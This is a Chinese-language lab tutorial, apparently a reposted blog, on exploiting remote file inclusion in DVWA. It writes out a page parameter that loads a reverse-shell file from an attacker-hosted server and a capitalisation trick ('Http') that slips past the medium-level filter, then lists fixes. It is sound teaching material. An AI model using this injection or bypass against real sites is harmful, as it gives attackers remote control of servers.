一、远程文件包含环境配置。
远程文件包含与上篇讲到的本地文件包含不同,是一种特例。
我们需要到Metasploit配置一下环境。
sudo nano /etc/php5/cgi/php.ini PHP配置文件
ctrl+w 搜索allow_url ,将allow_url_include = Off 改成On ctrl+x退出
完成后重启Web服务器
sudo etc/init.d/apache2 restart
======================================================================================================
二、远程文件包含漏洞-发现和利用
1. 创建一个reverse.txt文本文件,里面写入反弹shell的php代码如下:
2.将reverse.txt放入 /var/www/html文件夹下
3.本地浏览器访问查看
首先,kali开启web服务
然后浏览器访问:这里是txt不是php,因为我们不需要攻击主机去执行,需要的是目标服务器远程执行这条命令。
开启监听端口:
返回dvwa 文件包含那部分输入 ?page=http://192.168.164.128/reverse.txt?
监听端口成功连接,获得目标主机的控制权。
=================================================================
三、利用高级远程文件包含漏洞入侵网站。
将security level 设置为medium重复上述步骤,发现该漏洞已经修复。
报错,说明中级的防护应该做了过滤,我们试试过滤有没有对大小写进行限制。http修改成Http发现命令执行,说明过滤器对大小写不敏感,容易绕过。
查看源码发现也只是过滤了http:// https:// 所以使用过滤器并不是很好的防护,容易遗漏,过滤不全。
==========================================================================================
四、安全性-修复文件包含漏洞
1)RFI 远程文件包含漏洞解决方法:
禁止 allow_url_fopen & allow_url_include
sudo nano /etc/php5/cgi/php.ini
2)LFI 本地文件包含漏洞解决方法:
使用静态的文件包含
标签:文件,php,包含,渗透,漏洞,测试,txt,远程 来源: https://www.cnblogs.com/shacker/p/15943923.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。